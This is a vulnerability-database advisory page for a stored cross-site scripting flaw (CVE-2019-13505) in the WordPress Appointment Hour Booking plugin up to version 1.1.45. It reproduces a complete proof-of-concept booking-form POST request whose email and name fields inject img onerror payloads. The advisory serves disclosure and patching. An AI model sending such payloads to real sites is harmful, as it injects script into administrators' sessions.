Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitRyan DewhurstWPEX-ID:49B6FF20-83C7-4950-AD2F-BA6A7D75C851
HistoryJul 09, 2019 - 12:00 a.m.

Appointment Hour Booking <= 1.1.45 - Stored Cross-Site Scripting (XSS)

2019-07-0900:00:00
Ryan Dewhurst
12

EPSS

0.001

Percentile

36.4%

JSON

It is possible for an unauthenticated user to inject malicious JavaScript into a booking form, which will then be executed when an authenticated user views the booking in the WordPress admin interface.

POST /booking-form/ HTTP/1.1
Host: test.local
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://test.local/booking-form/
Content-Type: multipart/form-data; boundary=---------------------------11713224624340267851833710283
Content-Length: 1809
Connection: close
Cookie: PHPSESSID=fa36a83a2ad7a7fe7b4864024c59bb43; rand_code_1=aa42293c7e2c5cd53a016331a32e4676
Upgrade-Insecure-Requests: 1

-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_pform_psequence"

_1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_appbooking_pform_process"

1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_appbooking_id"

2
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="cp_ref_page"

http://test.local/booking-form/
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="form_structure_1"


-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="refpage_1"

http://test.local/booking-form/
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname1_1"

2019-07-13 12:00/13:00 0 1
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname1_1_services"

0
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname1_1_capacity"

0
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="tcostfieldname1_1"

1.00
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="email_1"

"><img src=x onerror=alert(1)><"
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="fieldname2_1"

"><img src=x onerror=alert(2)><"
-----------------------------11713224624340267851833710283
Content-Disposition: form-data; name="hdcaptcha_cp_appbooking_post"

auvoe
-----------------------------11713224624340267851833710283--

Related

patchstack 1
wpvulndb 1
prion 1
cve 1
nvd 1
openvas 1
cvelist 1
patchstack
patchstack
WordPress Appointment Hour Booking plugin <= 1.1.45 - Stored Cross-Site Scripting (XSS) vulnerability
2019-07-16 00:00:00
wpvulndb
wpvulndb
Appointment Hour Booking <= 1.1.45 - Stored Cross-Site Scripting (XSS)
2019-07-09 00:00:00
prion
prion
Design/Logic Flaw
2019-07-11 13:15:00
cve
cve
CVE-2019-13505
2019-07-11 13:15:11
nvd
nvd
CVE-2019-13505
2019-07-11 13:15:11
openvas
openvas
WordPress Appointment Hour Booking Plugin < 1.1.46 XSS Vulnerability
2023-08-01 00:00:00
cvelist
cvelist
CVE-2019-13505
2019-07-11 12:26:29

EPSS

0.001

Percentile

36.4%

JSON
Related for WPEX-ID:49B6FF20-83C7-4950-AD2F-BA6A7D75C851
patchstack1wpvulndb1prion1cve1nvd1openvas1cvelist1